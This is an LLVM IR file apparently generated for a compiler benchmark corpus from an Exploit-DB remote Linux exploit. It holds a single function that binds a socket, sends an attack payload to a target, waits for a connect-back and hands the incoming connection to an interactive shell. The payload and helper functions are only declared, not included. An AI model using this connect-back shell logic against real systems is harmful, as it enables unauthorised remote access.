; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_878.c_shell_connectback.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_878.c_shell_connectback.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [26 x i8] c"[-] Error creating socket\00", align 1
@.str.1 = private unnamed_addr constant [26 x i8] c"[-] Unable to bind/listen\00", align 1
@.str.2 = private unnamed_addr constant [27 x i8] c"[-] Unable to send payload\00", align 1
@.str.3 = private unnamed_addr constant [58 x i8] c"[-] Waiting 10s for incoming connection (connectback)...\0A\00", align 1
@stdout = common dso_local global i32 0, align 4
@.str.4 = private unnamed_addr constant [32 x i8] c"[-] Unable to accept connection\00", align 1
@llvm.used = appending global [1 x i8*] [i8* bitcast (void (i64, i32, i64, i8*, i32)* @shell_connectback to i8*)], section "llvm.metadata"

; Function Attrs: noinline nounwind optnone uwtable
define internal void @shell_connectback(i64 %0, i32 %1, i64 %2, i8* %3, i32 %4) #0 {
  %6 = alloca i64, align 8
  %7 = alloca i32, align 4
  %8 = alloca i64, align 8
  %9 = alloca i8*, align 8
  %10 = alloca i32, align 4
  %11 = alloca i32, align 4
  %12 = alloca i32, align 4
  store i64 %0, i64* %6, align 8
  store i32 %1, i32* %7, align 4
  store i64 %2, i64* %8, align 8
  store i8* %3, i8** %9, align 8
  store i32 %4, i32* %10, align 4
  %13 = call i32 (...) @sock_tcp_create()
  store i32 %13, i32* %11, align 4
  %14 = load i32, i32* %11, align 4
  %15 = icmp slt i32 %14, 0
  br i1 %15, label %16, label %18

16:                                               ; preds = %5
  %17 = call i32 @perror(i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str, i64 0, i64 0))
  br label %52

18:                                               ; preds = %5
  %19 = load i32, i32* %11, align 4
  %20 = load i64, i64* %6, align 8
  %21 = load i32, i32* %7, align 4
  %22 = call i64 @sock_bind(i32 %19, i64 %20, i32 %21)
  %23 = icmp slt i64 %22, 0
  br i1 %23, label %24, label %26

24:                                               ; preds = %18
  %25 = call i32 @perror(i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.1, i64 0, i64 0))
  br label %52

26:                                               ; preds = %18
  %27 = load i64, i64* %8, align 8
  %28 = load i32, i32* %7, align 4
  %29 = load i8*, i8** %9, align 8
  %30 = load i32, i32* %10, align 4
  %31 = call i64 @sock_send_payload(i64 %27, i32 %28, i8* %29, i32 %30)
  %32 = icmp slt i64 %31, 0
  br i1 %32, label %33, label %35

33:                                               ; preds = %26
  %34 = call i32 @perror(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.2, i64 0, i64 0))
  br label %52

35:                                               ; preds = %26
  %36 = call i32 @printf(i8* getelementptr inbounds ([58 x i8], [58 x i8]* @.str.3, i64 0, i64 0))
  %37 = load i32, i32* @stdout, align 4
  %38 = call i32 @fflush(i32 %37)
  %39 = load i32, i32* %11, align 4
  %40 = call i32 @sock_accept(i32 %39)
  store i32 %40, i32* %12, align 4
  %41 = load i32, i32* %12, align 4
  %42 = icmp slt i32 %41, 0
  br i1 %42, label %43, label %45

43:                                               ; preds = %35
  %44 = call i32 @perror(i8* getelementptr inbounds ([32 x i8], [32 x i8]* @.str.4, i64 0, i64 0))
  br label %52

45:                                               ; preds = %35
  %46 = load i32, i32* %11, align 4
  %47 = call i32 @sock_disconnect(i32 %46)
  %48 = load i32, i32* %12, align 4
  %49 = call i32 @shell(i32 %48)
  %50 = load i32, i32* %12, align 4
  %51 = call i32 @sock_disconnect(i32 %50)
  br label %52

52:                                               ; preds = %45, %43, %33, %24, %16
  ret void
}

declare dso_local i32 @sock_tcp_create(...) #1

declare dso_local i32 @perror(i8*) #1

declare dso_local i64 @sock_bind(i32, i64, i32) #1

declare dso_local i64 @sock_send_payload(i64, i32, i8*, i32) #1

declare dso_local i32 @printf(i8*) #1

declare dso_local i32 @fflush(i32) #1

declare dso_local i32 @sock_accept(i32) #1

declare dso_local i32 @sock_disconnect(i32) #1

declare dso_local i32 @shell(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
